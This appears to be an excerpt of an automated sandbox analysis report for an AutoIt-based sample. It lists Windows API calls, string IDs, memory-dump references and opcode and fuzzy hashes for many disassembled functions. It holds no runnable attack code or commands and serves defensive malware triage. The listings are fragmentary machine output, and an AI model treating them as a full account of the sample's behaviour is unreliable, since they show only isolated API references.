• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 002BEC4A
• GetDC.USER32(00000000), ref: 002BEC54
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BEC60
• ReleaseDC.USER32(?), ref: 002BEC81
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
Strings
Similarity
• API ID: LoadString
• String ID: @COM_EVENTOBJ$bn,
• API String ID: 2948472770-495244919
APIs
  • Part of subcall function 002805B2: EnterCriticalSection.KERNEL32(0033170C,?,00000000,?,0026D22A,00333570,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?), ref: 002805BD
  • Part of subcall function 002805B2: LeaveCriticalSection.KERNEL32(0033170C,?,0026D22A,00333570,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?,00000001,00332430), ref: 002805FA
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 00280413: __onexit.LIBCMT ref: 00280419
• __Init_thread_footer.LIBCMT ref: 002E8658
  • Part of subcall function 00280568: EnterCriticalSection.KERNEL32(0033170C,00000000,?,0026D258,00333570,002A27C9,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?), ref: 00280572
  • Part of subcall function 00280568: LeaveCriticalSection.KERNEL32(0033170C,?,0026D258,00333570,002A27C9,00000001,00000000,?,?,002DF023,?,?,00000000,00000001,?,00000001), ref: 002805A5
Strings
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: Variable must be of type 'Object'.$bn,
• API String ID: 535116098-1341112638
APIs
  • Part of subcall function 002641EA: _wcslen.LIBCMT ref: 002641EF
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 002D5919
Strings
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 002C58AF
Strings
Similarity
• API ID: ContainedObject
• String ID: 0$3$Container
• API String ID: 3565006973-1197391755
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0028E67D
Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 94acc6056786ab79e526c646100bbb540b73d4833fe6c691dd94d4d21639c1a1
• Instruction ID: def605a805bce23f78b3f50fd8c0dc7dbacb46f9115ff5378d959e0df3824e05
• Opcode Fuzzy Hash: 94acc6056786ab79e526c646100bbb540b73d4833fe6c691dd94d4d21639c1a1
• Instruction Fuzzy Hash: 9D51B965E3A10386CF127F14CD0136A6BACAB51700F394E59F099822E9FF718CB69B46
Strings
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: ca5deb2cb55754d85d4d13ec3177939cde2978db47eeb3475918be5993abb99e
• Instruction ID: 75315c143f350b0c073c609b1aaf718123f4f3320510d783d136cebe64e355b5
• Opcode Fuzzy Hash: ca5deb2cb55754d85d4d13ec3177939cde2978db47eeb3475918be5993abb99e
• Instruction Fuzzy Hash: F6513E31524247DFCB25DF28C041AFE7BB8AF59360F648059F9999B290DA309DB2CB61
APIs
• Sleep.KERNEL32(00000000), ref: 0027F6DB
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0027F6F4
Strings
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 28b35d72735600410dc2a9520ed3f1b2a555ec6bdae209e0d5d582037a996821
• Instruction ID: 432522897aacacb0376478b02aa1eeeea2976d712dd2d604766fea8e67426dde
• Opcode Fuzzy Hash: 28b35d72735600410dc2a9520ed3f1b2a555ec6bdae209e0d5d582037a996821
• Instruction Fuzzy Hash: 435159714187489BD320AF54DC86BAFB7ECFB84300F81895DF5D941191EB3089B9CB66
APIs
• _wcslen.LIBCMT ref: 002DDB75
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 002DDB7F
Strings
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 61fd4ef73d68e3cec7ace38e78b8592cbd69ec1e64aa9bcad8c64834b322c9f2
• Instruction ID: b086426c2fd8dcc675b3f2903e59c67d457ed5024645e6eda58d839bd0fb49cb
• Opcode Fuzzy Hash: 61fd4ef73d68e3cec7ace38e78b8592cbd69ec1e64aa9bcad8c64834b322c9f2
• Instruction Fuzzy Hash: 41314F71821119ABCF15EFA4CC85EEEBFB9FF44304F10012AF815A6266EB719966CF50
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 002F40BD
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002F40F8
Strings
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 40d037ab88ef8b4fedbe7187aeae06d6a105b93bfa320de1ccdb7ebee95fefa1
• Instruction ID: c0bf4075791a035a1546438207bf25d7eb235d43c482517116287170959b8858
• Opcode Fuzzy Hash: 40d037ab88ef8b4fedbe7187aeae06d6a105b93bfa320de1ccdb7ebee95fefa1
• Instruction Fuzzy Hash: 14319471120608AADB14DF74DC40FFBB3A9FF48764F00862DFA5587190DA71AC91DB60
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 002F50BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002F50D2
Strings
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 18ee34266af625be87706a1381b4c2e7f29ba347adf2d6a9b8a9e1031f56442c
• Instruction ID: 72ca99f64ac566810d4576a780bea30d73b5a94977fc4aaa82c98d146814c8f8
• Opcode Fuzzy Hash: 18ee34266af625be87706a1381b4c2e7f29ba347adf2d6a9b8a9e1031f56442c
• Instruction Fuzzy Hash: D8313874A1061A9FDB14CF69C980BEABBB5FF49340F10407EEA04AB351DB71A955CF90
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
  • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
• GetParent.USER32(?), ref: 002A3440
• DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 002A34CA
Strings
Similarity
• API ID: LongWindow$ParentProc
• String ID: (3
• API String ID: 2181805148-113007392
• Opcode ID: 072ecbeca848d99ef1813b80a56d42d0bbbf1e5584134e15852983769ba318a0
• Instruction ID: b01e71312fd54c3f7506f95e0474946f103b471788441b40087649fe31904a19
• Opcode Fuzzy Hash: 072ecbeca848d99ef1813b80a56d42d0bbbf1e5584134e15852983769ba318a0
• Instruction Fuzzy Hash: CB21A231611555EFCB26DF28C849DA53B66EF0B360F140294F6294B2E2C7318EB9DB10
APIs
  • Part of subcall function 00267873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002678B1
  • Part of subcall function 00267873: GetStockObject.GDI32(00000011), ref: 002678C5
  • Part of subcall function 00267873: SendMessageW.USER32(00000000,00000030,00000000), ref: 002678CF
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 002F4216
                                                                                                                                                                        • GetSysColor.USER32(00000012), ref: 002F4230
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                        • String ID: static
                                                                                                                                                                        • API String ID: 1983116058-2160076837
                                                                                                                                                                        • Opcode ID: e58877be56a3d514af7a50f5d072abf9fe429e9857d88b94ddf52cfafab38e36
                                                                                                                                                                        • Instruction ID: 96179a173f29d64050666224ba99494cca49cfc0b525189063c360eec5e88f12
                                                                                                                                                                        • Opcode Fuzzy Hash: e58877be56a3d514af7a50f5d072abf9fe429e9857d88b94ddf52cfafab38e36
                                                                                                                                                                        • Instruction Fuzzy Hash: C511267262020AAFDB01DFA8DC45AFEBBA8EB08354F014925FE55E3250D774E861DB60
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 002DD7C2
                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 002DD7EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                                                        • String ID: <local>
                                                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                                                        • Opcode ID: e6d8f15e84f8526f685ca488806e8e641be09cc406f1802ae8d58364b6b60155
                                                                                                                                                                        • Instruction ID: 3a3092df8344ba1c682458de08627803655b254139f462cfbc8bb6ced0749903
                                                                                                                                                                        • Opcode Fuzzy Hash: e6d8f15e84f8526f685ca488806e8e641be09cc406f1802ae8d58364b6b60155
                                                                                                                                                                        • Instruction Fuzzy Hash: BC112571261A32BAE7344F668C49EF7FE9DEF127A4F00426BF50983280D2A09C50C2F0
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 002C761D
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002C7629
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                        • Opcode ID: 98c2fba4cb40290da5e5fadea4355060d119baa8eb47e83e99a1a998962562a3
                                                                                                                                                                        • Instruction ID: 9441639c7f1ddd8c89b0bd656def895108702469acd764d311c35b2fe3e9168d
                                                                                                                                                                        • Opcode Fuzzy Hash: 98c2fba4cb40290da5e5fadea4355060d119baa8eb47e83e99a1a998962562a3
                                                                                                                                                                        • Instruction Fuzzy Hash: 15010432A349278BCB11AEBCDC40EBF73BDBF60354B200629E421D2291EB30D860CE40
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002C2699
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: f7fd97aee90d03fcdbd3d96581ade656ab578728944c1c5733af5dcce3c2162d
                                                                                                                                                                        • Instruction ID: 6d30e07abddc8a83dc873b871b04ec1bbcd88a1f736b7d2dc70a53583e32f9ef
                                                                                                                                                                        • Opcode Fuzzy Hash: f7fd97aee90d03fcdbd3d96581ade656ab578728944c1c5733af5dcce3c2162d
                                                                                                                                                                        • Instruction Fuzzy Hash: CF01DE35A60225EB8B05BBA0CC51EFE7368EF46360B50071DA822972C1DF3158AC8A60
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 002C2593
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                        • Opcode ID: 7af814e81b0c99181363fd41516af4f025f8a4a804a8a1f61686726687de8757
                                                                                                                                                                        • Instruction ID: 0c339fe62cea8744d8a09188207d59b4646ce3aa42fa8eb76842d0736a98de09
                                                                                                                                                                        • Opcode Fuzzy Hash: 7af814e81b0c99181363fd41516af4f025f8a4a804a8a1f61686726687de8757
                                                                                                                                                                        • Instruction Fuzzy Hash: FB01AC75A60105EBCB09FB54C962FFF77A8DF55780F90022DB802A7281DE519E6CCAB1
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
                                                                                                                                                                          • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 002C2615
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 5dc6ca0cef4d5c1179c7336aaf86203afce3cf8f78a88812b4b4919dedcd4b5d
• Instruction ID: c25b3c9161b7fee06e386a862180fccc0464537849474616f9ff61dcca9fe7dc
• Opcode Fuzzy Hash: 5dc6ca0cef4d5c1179c7336aaf86203afce3cf8f78a88812b4b4919dedcd4b5d
• Instruction Fuzzy Hash: 0901F775A20105A6CB06FB50D952FFF73ACCF15380F500229B802E3281DE618E6CCAB1
APIs
  • Part of subcall function 0026B329: _wcslen.LIBCMT ref: 0026B333
  • Part of subcall function 002C45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002C4620
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 002C2720
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 9bdf38547e448f726861a90a6ee9b96516be9e4574ae331a062d36d8486ad665
• Instruction ID: c027cdf2c5d532dd046dfe65cf97c475469d87d63bf79e82ac542a4c35599769
• Opcode Fuzzy Hash: 9bdf38547e448f726861a90a6ee9b96516be9e4574ae331a062d36d8486ad665
• Instruction Fuzzy Hash: 68F08675A60115A6DB05B7649C92FFEB768EF05790F400A19B422A72C1DE61586C8660
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 002F9B6D
  • Part of subcall function 00262234: GetWindowLongW.USER32(?,000000EB), ref: 00262242
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 002F9B53
Strings
Similarity
• API ID: LongWindow$MessageProcSend
• String ID: (3
• API String ID: 982171247-113007392
• Opcode ID: 5b070508210ee4a709bc8b8d92ecb7a42a3f2f8b0f39946e0e0d9cf372899efe
• Instruction ID: 2fc82f857b3cd33bb7f87479dda8a0273c1674dfd71a30c8bdc49363c7573074
• Opcode Fuzzy Hash: 5b070508210ee4a709bc8b8d92ecb7a42a3f2f8b0f39946e0e0d9cf372899efe
• Instruction Fuzzy Hash: 0101D43011121CEFCB259F14EC88F76BB66FB853A8F100578FA021A1F0C77268A5DB51
Strings
Similarity
• API ID:
• String ID: 2<)$j30
• API String ID: 0-2774254245
• Opcode ID: a36a3bf9414bbaf3c4a66f0af0b55eca5b3cb1506326ee1a5b108684d3b1db9b
• Instruction ID: c0140edae583d86daaec41065948aab6b874d2388849229100630322a1d192a9
• Opcode Fuzzy Hash: a36a3bf9414bbaf3c4a66f0af0b55eca5b3cb1506326ee1a5b108684d3b1db9b
• Instruction Fuzzy Hash: D8F0B435524149AADF14DF91C850AF973F8DF04710F10406ABDCAC7690EBB48FA1D365
APIs
  • Part of subcall function 0026249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002624B0
• GetWindowLongW.USER32(?,000000F0), ref: 002F8471
• GetWindowLongW.USER32(?,000000EC), ref: 002F847F
Strings
Similarity
• API ID: LongWindow
• String ID: (3
• API String ID: 1378638983-113007392
• Opcode ID: 208dc8f2510e5c5a407bd5679366a66a7031cac6abe664ca624949dfffbb3915
• Instruction ID: afef266e39e670baa4bf22121d820762f9c92d9111c9f512e6b2691c7b2760d8
• Opcode Fuzzy Hash: 208dc8f2510e5c5a407bd5679366a66a7031cac6abe664ca624949dfffbb3915
• Instruction Fuzzy Hash: FDF03C352112459FC705DF68EC44E7AB7A9FB86360F114629FA268B3B0CB309860DB10
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002C146F
Strings
Similarity
• API ID: Message
• String ID: AutoIt$Error allocating memory.
• API String ID: 2030045667-4017498283
• Opcode ID: 7ce933a85640607a74390761eb9d54d06a45cc8f56ea55a92459ef966954d4dc
• Instruction ID: c602cc4a02b96b7a75fbf40b9ca58594744245099f9a366b374968abb04256f3
• Opcode Fuzzy Hash: 7ce933a85640607a74390761eb9d54d06a45cc8f56ea55a92459ef966954d4dc
• Instruction Fuzzy Hash: 93E0D8322A532836D6243794BC47F98B6858F05BA1F11442AF78C544C38EE224B05799
APIs
  • Part of subcall function 0027FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002810E2,?,?,?,0026100A), ref: 0027FAD9
• IsDebuggerPresent.KERNEL32(?,?,?,0026100A), ref: 002810E6
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0026100A), ref: 002810F5
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002810F0
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 55579361-631824599
• Opcode ID: 8511b68664941cadbf81373764bfc90ec1664573579cc90aa9ad514466f2bce1
• Instruction ID: f253db15ddd9e00700c81d80afa6453b2788d69f19ce2dae1b1217a1d774c0c4
• Opcode Fuzzy Hash: 8511b68664941cadbf81373764bfc90ec1664573579cc90aa9ad514466f2bce1
• Instruction Fuzzy Hash: E4E092746157518BD371AF24E948743BBE8AF00350F008D6CE88AD26D2DBB4E494CF91
APIs
• __Init_thread_footer.LIBCMT ref: 0027F151
Strings
Similarity
• API ID: Init_thread_footer
• String ID: `53$h53
• API String ID: 1385522511-3499738754
• Opcode ID: 55ae8ad7d47897d629290f33076148816f06d40137751172bc0a49183e9c5187
• Instruction ID: f963d94fc6e4043359e7de2cdc3027d1d86fb9fa460be5b76feae347c3a6131c
• Opcode Fuzzy Hash: 55ae8ad7d47897d629290f33076148816f06d40137751172bc0a49183e9c5187
• Instruction Fuzzy Hash: F9E0203A5B8414CBD542E71CD9C19843354FB06320FD0C174E11D472D1D7381B52CF14
APIs
• GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002D39F0
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002D3A05
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: fd37779a60a3c77e8e02f478a4de21f76d6e6bc329b8dd3bfe42c7f29ca1f748
• Instruction ID: f95e4e48d3933ceedb326b32469a7be1e5cae8850e3e5eb173f2448850d6910e
• Opcode Fuzzy Hash: fd37779a60a3c77e8e02f478a4de21f76d6e6bc329b8dd3bfe42c7f29ca1f748
• Instruction Fuzzy Hash: 0AD05E7250032867DB20A764AD0EFDB7A6CDB45760F0002A1BE5592092DAB0EA85CBD0
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F2DC8
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002F2DDB
  • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: d5d5f2c4f51dc917a52ea56728ef2fceeba386c92b3282a9a98256123a37ace7
• Instruction ID: cc19abfbfaa248bfdb057e479cf1bde59e6b902f634cc981af33e96a03405ee0
• Opcode Fuzzy Hash: d5d5f2c4f51dc917a52ea56728ef2fceeba386c92b3282a9a98256123a37ace7
• Instruction Fuzzy Hash: 02D01235395310B7E668B770BD5FFF67B55AF50B60F504835B749AA1D0C9E06800CA54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002F2E08
• PostMessageW.USER32(00000000), ref: 002F2E0F
  • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 89ca58fdeb8293e20b64b42106fe1752bd74205f5f1f24cd0fa4f917aa5fb49b
• Instruction ID: 15532845c81fc2e0e85a20ee94897cbc13f3b78d64cf40a5563417e282f0ff51
• Opcode Fuzzy Hash: 89ca58fdeb8293e20b64b42106fe1752bd74205f5f1f24cd0fa4f917aa5fb49b
• Instruction Fuzzy Hash: DCD022313C13107BF268B330BC0FFE23B15AB00B60F500834B705EA0C0C8E06800CA44
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0029C213
• GetLastError.KERNEL32 ref: 0029C221
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029C27C
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: eda3466e6a75bceb6869c0af6f07f0fb40a44f9cb5a80d26bd7e8e6a514d48e2
• Instruction ID: db2138d618dd80f7946f5123d8aa1d6bb7172bcde13fde3848818c5ba021417b
• Opcode Fuzzy Hash: eda3466e6a75bceb6869c0af6f07f0fb40a44f9cb5a80d26bd7e8e6a514d48e2
• Instruction Fuzzy Hash: 1241C830A20616EFDF259FE5C844BBA7BA9AF51720F34416AFC59971A1DB308D21CB60